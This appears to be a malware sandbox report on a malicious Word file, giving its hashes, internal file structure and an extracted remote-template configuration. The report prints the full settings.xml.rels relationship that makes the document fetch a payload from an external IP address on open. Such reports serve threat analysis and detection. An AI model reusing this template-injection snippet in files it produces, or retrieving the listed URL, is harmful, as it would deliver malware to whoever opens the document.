Malicious
Malicious

4bc14b6b3ee8d410e4304d39946147b5

MS Word Document
|
MD5: 4bc14b6b3ee8d410e4304d39946147b5
|
Size: 475.09 KB
|
application/msword

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
4bc14b6b3ee8d410e4304d39946147b5
Sha1
22271f9f95d2c489f1dae3c934f5d2bb4bcc7e17
Sha256
1c3b78df22f115b0cfdbd97acb8f45441c84b4dd2ea8168beaba96a2d5e26bbe
Sha384
d32cacfd578047f479a1703af707df0a52c9f311689ed38cdcad8d0500ce7e111a8d7a3e658d7e8dfb540c7291627a67
Sha512
2848224ce2f3d3fc7d5f7b8cee06a6ac94226731072aa0e403f3e4d1103afae7b539699937d222d777a10d6f671c14d93cc281ce02cca758e4e0070182debe97
SSDeep
6144:Px0hYPbZtrJRozLmWsXi9EUpyIsUsWjRlQwYieJ02JKtm2VkClXs7v1RKA7Xc:J0SdrxfX/UVsSRl4Nktm2VkkXsu
TLSH
CAA4122059C748BF4F82E936FDE6311A63DE4C0325124E2E36E676FF13A54A7DA06709
File Structure
4bc14b6b3ee8d410e4304d39946147b5
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
settings.xml.rels
Malicious
document.xml
theme
theme1.xml
settings.xml
fontTable.xml
webSettings.xml
styles.xml
docProps
app.xml
core.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

http://91.92.243.254/myofficefilexx.doc
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://91.92.243.254/myofficefilexx.doc" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

http://91.92.243.254/myofficefilexx.doc
4bc14b6b3ee8d410e4304d39946147b5 (475.09 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙